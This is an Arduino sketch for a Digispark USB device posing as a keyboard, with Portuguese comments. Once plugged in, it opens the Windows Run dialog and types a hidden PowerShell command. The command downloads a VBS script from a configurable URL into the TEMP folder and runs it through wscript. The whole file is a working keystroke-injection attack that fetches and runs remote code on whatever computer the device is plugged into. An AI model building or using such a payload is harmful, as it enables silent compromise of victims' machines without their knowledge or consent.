#include "DigiKeyboard.h"

// ========== CONFIG ==========
const char SCRIPT_URL[] = "https://example.com/meu_script.vbs"; // <- troque aqui
const char OUT_NAME[]   = "meu_script.vbs";                    // <- troque aqui
// ============================

void typeString(const char *s, unsigned int interCharDelay = 8) {
  for (const char *p = s; *p; ++p) {
    DigiKeyboard.sendKeyStroke(0);
    DigiKeyboard.write(*p); // ✅ substitui printChar()
    DigiKeyboard.delay(interCharDelay);
  }
}

void setup() {
  DigiKeyboard.delay(800);

  // Abre o "Executar" (Win+R)
  DigiKeyboard.sendKeyStroke(KEY_R, MOD_GUI_LEFT);
  DigiKeyboard.delay(500);

  // Comando PowerShell completo:
  // powershell -NoProfile -WindowStyle Hidden -Command "Invoke-WebRequest 'URL' -OutFile $env:TEMP\\meu_script.vbs; Start-Process wscript -ArgumentList \"$env:TEMP\\meu_script.vbs\""
  const char *prefix  = "powershell -NoProfile -WindowStyle Hidden -Command \"Invoke-WebRequest '";
  const char *mid1    = "' -OutFile $env:TEMP\\\\";
  const char *mid2    = "; Start-Process wscript -ArgumentList \\\"$env:TEMP\\\\";
  const char *suffix  = "\\\"\"";

  typeString(prefix);
  typeString(SCRIPT_URL);
  typeString(mid1);
  typeString(OUT_NAME);
  typeString(mid2);
  typeString(OUT_NAME);
  typeString(suffix);

  DigiKeyboard.delay(200);
  DigiKeyboard.sendKeyStroke(KEY_ENTER);
}

void loop() {}
